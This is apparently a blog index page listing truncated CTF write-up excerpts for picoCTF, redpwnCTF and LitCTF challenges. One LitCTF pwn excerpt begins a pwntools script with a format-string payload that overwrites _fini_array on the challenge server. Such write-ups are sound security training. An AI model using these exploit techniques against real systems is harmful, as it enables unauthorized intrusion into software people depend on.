picoCTF 2022 - Solfire - Pwn
This is a CTF Security challenge which involves exploiting a Solana on-chain program.
NOTE: This challenge is now part of the picoGym practice challenges
Points: 500
Category: Binary exploitation (pwn)
Challenge Author: Robert Chen (NotDeGhost)
Description
What is debt? A perversion of a promise?
Surely one has to pay one’s debts.
TL;...
redpwnCTF - Web
web/cool (125 solves / 122 points)
Description:
Aaron has a message for the cool kids. For support, DM BrownieInMotion.
cool.mc.ax
Downloads:
app.py
Solution:
Source code:
from flask import (
Flask,
request,
render_template_string,
session,
redirect,
send_file
)
from random import SystemRandom
impo...
redpwnCTF - Rev
bread-making (317 solves/108 points)
Description:
My parents aren’t home! Quick, help me make some bread please…
nc mc.ax 31796
bread
Solution:
Let’s open this up in ghidra to see what it does. First things first, find the main func and read through all the strings. The main func is typically the first parameter in entry which is always labele...
redpwnCTF - Misc
misc (algo)/the-substitution-game (67 solves / 145 points)
Description:
nc mc.ax 31996
chall.py
Solution:
When we run this we get using python3:
Welcome to The Substitution Game!
In each level, you will enter a list of string substitutions.
For example, you may want to change every instance of 'abcd' to 'def'.
The game will provide a series o...
redpwnCTF - Crypto
baby (827 solves/102 points)
Description:
I want to do an RSA! output.txt
Solution:
Right off the bat: RSA encryption time. Let’s open up the file and see what we have
n: 228430203128652625114739053365339856393
e: 65537
c: 126721104148692049427127809839057445790
Wow, small N. Let’s use an integar factorization calculator
Factoring n gives us p...
LitCTF - Web
web/LIT BUGS (92 solves / 129 points)
Description
Last year�s LIT platform may or may not have had some security vulnerabilities. We have created a simplified version of last year�s platform called LIT BUGS (Lexington Informatics Tournament�s Big Unsafe Grading System). The flag is the team name of the only registered user. Visit LIT BUGS here
D...
LitCTF - Pwn
pwn/Lazy
Annotated script:##
from pwn import *
elf = ELF("lazy")
libc = ELF("libc-2.31.so")
#conn = elf.process()
conn = remote("lazy.litctf.live", 1337)
# overwrite _fini_array with main()
fini = 0x0000000004031c8
# overwrite char by char because we dont wanna get huge chunks of text from server
payload = b"%17c%12$hhn%47c%11$hhn%18c%13$hhnb...
LitCTF - Rev
rev/Evaluation (201 solves/112 points)
Description:
Here’s an evaluation copy of my flag checker! I hid the flag in the evaluation copy though…
print(eval(eval(eval(eval(eval(eval("''.join([chr(i) for i in [39,39,46,106,111,105,110,40,91,99,104,114,40,105,41,32,102,111,114,32,105,32,105,110,32,91,51,57,44,51,57,44,52,54,44,49,48,54,44,49,49,49,4...
13 post articles, 2 pages.